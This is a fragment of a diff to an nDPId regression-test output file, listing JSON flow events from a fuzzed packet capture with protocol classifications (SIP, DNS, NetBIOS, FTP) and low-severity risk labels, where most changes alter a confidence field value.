-00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471001263,"flow_last_seen":1120471001263,"flow_idle_time":200000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.234.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 
-00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1120470796941,"flow_last_seen":1120471094413,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":10425,"flow_avg_l4_payload_len":453,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1120469540839,"flow_last_seen":1120471067960,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":3442,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
+00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471033895,"flow_last_seen":1120471033895,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470984353,"flow_last_seen":1120470984353,"flow_idle_time":200000,"flow_min_l4_payload_len":324,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.201","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471001263,"flow_last_seen":1120471001263,"flow_idle_time":200000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.234.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1120470796941,"flow_last_seen":1120471094413,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":10425,"flow_avg_l4_payload_len":453,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470831403,"flow_last_seen":1120470831403,"flow_idle_time":620000,"flow_min_l4_payload_len":474,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":474,"flow_avg_l4_payload_len":474,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","l4_proto":0,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470831403,"flow_last_seen":1120470831403,"flow_idle_time":620000,"flow_min_l4_payload_len":474,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":474,"flow_avg_l4_payload_len":474,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","l4_proto":0,"flow_datalink":1,"flow_max_packets":3} -00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471065349,"flow_last_seen":1120471065349,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2572,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471065349,"flow_last_seen":1120471065349,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2572,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00828{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635046,"flow_last_seen":1120469635046,"flow_idle_time":7580000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2208,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635046,"flow_last_seen":1120469635046,"flow_idle_time":7580000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2208,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635173,"flow_last_seen":1120469635173,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.232.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -1378,29 +1378,29 @@ 00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635129,"flow_last_seen":1120469635129,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"147.234.1.253","src_port":2721,"dst_port":58999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635129,"flow_last_seen":1120469635129,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"147.234.1.253","src_port":2721,"dst_port":58999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471086377,"flow_last_seen":1120471086377,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"116.168.1.2","dst_ip":"192.168.1.1","src_port":2829,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470916875,"flow_last_seen":1120470916875,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.233.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2811,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470916875,"flow_last_seen":1120470916875,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.233.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2811,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470916873,"flow_last_seen":1120470916873,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2811,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470949427,"flow_last_seen":1120470958433,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2812,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470966440,"flow_last_seen":1120470966440,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2813,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470966852,"flow_last_seen":1120470975858,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2814,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470983860,"flow_last_seen":1120470983860,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2815,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470983860,"flow_last_seen":1120470983860,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2815,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470983999,"flow_last_seen":1120470993243,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2816,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471001245,"flow_last_seen":1120471001245,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2822,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120471001714,"flow_last_seen":1120471010718,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2823,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120471018720,"flow_last_seen":1120471018721,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2824,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120471018720,"flow_last_seen":1120471018721,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2824,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1120471019307,"flow_last_seen":1120471028313,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2825,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120471036315,"flow_last_seen":1120471036317,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2826,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120471036315,"flow_last_seen":1120471036317,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2826,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471049334,"flow_last_seen":1120471049334,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2827,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471048339,"flow_last_seen":1120471048339,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.114","src_port":2827,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471065347,"flow_last_seen":1120471065347,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2828,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471082371,"flow_last_seen":1120471082371,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.54.2","dst_ip":"192.168.1.1","src_port":2829,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120471077370,"flow_last_seen":1120471078365,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2829,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1120471084097,"flow_last_seen":1120471088463,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2830,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120471094410,"flow_last_seen":1120471094412,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2831,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1120471084097,"flow_last_seen":1120471088463,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2830,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120471094410,"flow_last_seen":1120471094412,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2831,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 